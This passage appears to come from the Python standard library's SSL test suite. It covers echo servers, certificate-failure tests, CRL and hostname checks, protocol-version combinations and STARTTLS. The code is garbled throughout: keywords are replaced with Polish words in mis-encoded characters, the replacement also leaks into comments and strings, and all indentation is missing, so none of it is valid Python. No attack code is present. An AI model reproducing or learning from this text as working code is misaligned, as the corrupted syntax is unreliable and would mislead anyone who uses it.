self.context.load_verify_locations(cacerts)
jeลผeli certificate:
self.context.load_cert_chain(certificate)
jeลผeli npn_protocols:
self.context.set_npn_protocols(npn_protocols)
jeลผeli alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
jeลผeli ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = Nic
self.active = Nieprawda
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = Prawda
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
zwrรณฤ self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=Nic):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = Prawda
jeลผeli self.flag:
# signal an event
self.flag.set()
dopรณki self.active:
sprรณbuj:
newconn, connaddr = self.sock.accept()
jeลผeli support.verbose oraz self.chatty:
sys.stdout.write(' server: new connection z '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
wyjฤ
wszy socket.timeout:
dalej
wyjฤ
wszy KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = Nieprawda
klasa AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
klasa EchoServer (asyncore.dispatcher):
klasa ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=Prawda,
certfile=certfile,
do_handshake_on_connect=Nieprawda)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = Prawda
self._do_ssl_handshake()
def readable(self):
jeลผeli isinstance(self.socket, ssl.SSLSocket):
dopรณki self.socket.pending() > 0:
self.handle_read_event()
zwrรณฤ Prawda
def _do_ssl_handshake(self):
sprรณbuj:
self.socket.do_handshake()
wyjฤ
wszy (ssl.SSLWantReadError, ssl.SSLWantWriteError):
zwrรณฤ
wyjฤ
wszy ssl.SSLEOFError:
zwrรณฤ self.handle_close()
wyjฤ
wszy ssl.SSLError:
podnieล
wyjฤ
wszy OSError jako err:
jeลผeli err.args[0] == errno.ECONNABORTED:
zwrรณฤ self.handle_close()
inaczej:
self._ssl_accepting = Nieprawda
def handle_read(self):
jeลผeli self._ssl_accepting:
self._do_ssl_handshake()
inaczej:
data = self.recv(1024)
jeลผeli support.verbose:
sys.stdout.write(" server: read %s z client\n" % repr(data))
jeลผeli nie data:
self.close()
inaczej:
self.send(data.lower())
def handle_close(self):
self.close()
jeลผeli support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
podnieล
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
jeลผeli support.verbose:
sys.stdout.write(" server: new connection z %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
podnieล
def __init__(self, certfile):
self.flag = Nic
self.active = Nieprawda
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = Prawda
def __str__(self):
zwrรณฤ "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
zwrรณฤ self
def __exit__(self, *args):
jeลผeli support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
jeลผeli support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
jeลผeli support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=Nic):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = Prawda
jeลผeli self.flag:
self.flag.set()
dopรณki self.active:
sprรณbuj:
asyncore.loop(1)
wyjฤ
wszy:
dalej
def stop(self):
self.active = Nieprawda
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server przy CERT_REQUIRED, oraz check that trying to
connect to it przy the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=Nieprawda,
connectionchatty=Nieprawda)
przy server:
sprรณbuj:
przy socket.socket() jako sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
wyjฤ
wszy ssl.SSLError jako x:
jeลผeli support.verbose:
sys.stdout.write("\nSSLError jest %s\n" % x.args[1])
wyjฤ
wszy OSError jako x:
jeลผeli support.verbose:
sys.stdout.write("\nOSError jest %s\n" % x.args[1])
wyjฤ
wszy OSError jako x:
jeลผeli x.errno != errno.ENOENT:
podnieล
jeลผeli support.verbose:
sys.stdout.write("\OSError jest %s\n" % str(x))
inaczej:
podnieล AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=Prawda, connectionchatty=Nieprawda, sni_name=Nic):
"""
Launch a server, connect a client to it oraz try various reads
oraz writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=Nieprawda)
przy server:
przy client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) jako s:
s.connect((HOST, server.port))
dla arg w [indata, bytearray(indata), memoryview(indata)]:
jeลผeli connectionchatty:
jeลผeli support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
jeลผeli connectionchatty:
jeลผeli support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
jeลผeli outdata != indata.lower():
podnieล AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
jeลผeli connectionchatty:
jeลผeli support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
zwrรณฤ stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=Nic, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* jest true, assert that the connection succeeds,
jeลผeli it's false, assert that the connection fails.
Also, jeลผeli *expect_success* jest a string, assert that it jest the protocol
version actually used by the connection.
"""
jeลผeli certsreqs jest Nic:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
jeลผeli support.verbose:
formatstr = (expect_success oraz " %s->%s %s\n") albo " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting z OpenSSL 1.0.0 (see issue #8322).
jeลผeli client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
dla ctx w (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
sprรณbuj:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda, connectionchatty=Nieprawda)
# Protocol mismatch can result w either an SSLError, albo a
# "Connection reset by peer" error.
wyjฤ
wszy ssl.SSLError:
jeลผeli expect_success:
podnieล
wyjฤ
wszy OSError jako e:
jeลผeli expect_success albo e.errno != errno.ECONNRESET:
podnieล
inaczej:
jeลผeli nie expect_success:
podnieล AssertionError(
"Client protocol %s succeeded przy server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
albo_inaczej (expect_success jest nie Prawda
oraz expect_success != stats['version']):
podnieล AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
klasa ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
jeลผeli support.verbose:
sys.stdout.write("\n")
dla protocol w PROTOCOLS:
przy self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
def test_getpeercert(self):
jeลผeli support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=Nieprawda)
przy server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=Nieprawda)
s.connect((HOST, server.port))
# getpeercert() podnieล ValueError dopรณki the handshake isn't
# done.
przy self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
cipher = s.cipher()
jeลผeli support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher jest " + str(cipher) + '.\n')
jeลผeli 'subject' nie w cert:
self.fail("No subject field w certificate: %s." %
pprint.pformat(cert))
jeลผeli ((('organizationName', 'Python Software Foundation'),)
nie w cert['subject']):
self.fail(
"Missing albo invalid 'organizationName' field w certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
jeลผeli support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should dalej
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
przy self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file jest signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
def test_check_hostname(self):
jeลผeli support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = Prawda
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket(),
server_hostname="localhost") jako s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertPrawda(cert, "Can't get peer certificate.")
# incorrect hostname should podnieล an exception
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy context.wrap_socket(socket.socket(),
server_hostname="invalid") jako s:
przy self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=Prawda)
przy server:
przy socket.socket() jako s:
przy self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting przy an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting przy a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting przy a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting przy a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) albo os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should podnieล an OSError
w the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs w a thread. It sits w an accept() until
# the main thread connects. Then it rudely closes the socket,
# oraz sets Event `listener_gone` to let the main thread know
# the socket jest gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
przy socket.socket() jako c:
c.connect((HOST, port))
listener_gone.wait()
sprรณbuj:
ssl_sock = ssl.wrap_socket(c)
wyjฤ
wszy OSError:
dalej
inaczej:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
sprรณbuj:
connector()
w_koลcu:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL jest compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, Prawda)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, Prawda, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, Prawda, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, Nieprawda)
# SSLv23 client przy specific SSL options
jeลผeli no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
sprรณbuj:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, Prawda)
wyjฤ
wszy OSError jako x:
# this fails on some older versions of OpenSSL (0.9.7l, dla instance)
jeลผeli support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server przy specific SSL options
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, Nieprawda,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, Prawda,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, Nieprawda,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL jest compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, Nieprawda)
jeลผeli no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, 'SSLv3',
client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server przy various client options"""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 nie supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server przy various client options.
Testing against older TLS versions."""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, Nieprawda)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 nie supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server przy various client options.
Testing against older TLS versions."""
jeลผeli support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, Nieprawda)
jeลผeli hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, Nieprawda,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, Nieprawda)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, Nieprawda)
def test_starttls(self):
"""Switching z clear text to encrypted oraz back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=Prawda,
chatty=Prawda,
connectionchatty=Prawda)
wrapped = Nieprawda
przy server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
jeลผeli support.verbose:
sys.stdout.write("\n")
dla indata w msgs:
jeลผeli support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
jeลผeli wrapped:
conn.write(indata)
outdata = conn.read()
inaczej:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
jeลผeli indata == b"STARTTLS" oraz msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
jeลผeli support.verbose:
sys.stdout.write(
" client: read %r z server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = Prawda
albo_inaczej indata == b"ENDTLS" oraz msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
jeลผeli support.verbose:
sys.stdout.write(
" client: read %r z server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = Nieprawda
inaczej:
jeลผeli support.verbose:
sys.stdout.write(
" client: read %r z server\n" % msg)
jeลผeli support.verbose:
sys.stdout.write(" client: closing connection.\n")
jeลผeli wrapped:
conn.write(b"over\n")
inaczej:
s.send(b"over\n")
jeลผeli wrapped:
conn.close()
inaczej:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create oraz manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
jeลผeli support.verbose:
sys.stdout.write('\n')
przy open(CERTFILE, 'rb') jako f:
d1 = f.read()
d2 = ''
# now fetch the same data z the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
sprรณbuj:
dlen = f.info().get("content-length")
jeลผeli dlen oraz (int(dlen) > 0):
d2 = f.read(int(dlen))
jeลผeli support.verbose:
sys.stdout.write(
" client: read %d bytes z remote server '%s'\n"
% (len(d2), server))
w_koลcu:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
jeลผeli support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
przy server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
jeลผeli support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
jeลผeli support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
jeลผeli outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
jeลผeli support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
jeลผeli support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() oraz friends."""
jeลผeli support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=Prawda,
connectionchatty=Nieprawda)
przy server:
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods dla standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
zwrรณฤ b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
zwrรณฤ b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, Prawda, []),
('sendto', s.sendto, Nieprawda, ["some.address"]),
('sendall', s.sendall, Prawda, []),
]
recv_methods = [
('recv', s.recv, Prawda, []),
('recvfrom', s.recvfrom, Nieprawda, ["some.address"]),
('recv_into', _recv_into, Prawda, []),
('recvfrom_into', _recvfrom_into, Nieprawda, []),
]
data_prefix = "PREFIX_"
dla meth_name, send_meth, expect_success, args w send_methods:
indata = (data_prefix + meth_name).encode('ascii')
sprรณbuj:
send_meth(indata, *args)
outdata = s.read()
jeลผeli outdata != indata.lower():
self.fail(
"While sending przy <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
wyjฤ
wszy ValueError jako e:
jeลผeli expect_success:
self.fail(
"Failed to send przy method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
jeลผeli nie str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed przy unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
dla meth_name, recv_meth, expect_success, args w recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
sprรณbuj:
s.send(indata)
outdata = recv_meth(*args)
jeลผeli outdata != indata.lower():
self.fail(
"While receiving przy <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
wyjฤ
wszy ValueError jako e:
jeลผeli expect_success:
self.fail(
"Failed to receive przy method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
jeลผeli nie str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed przy unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
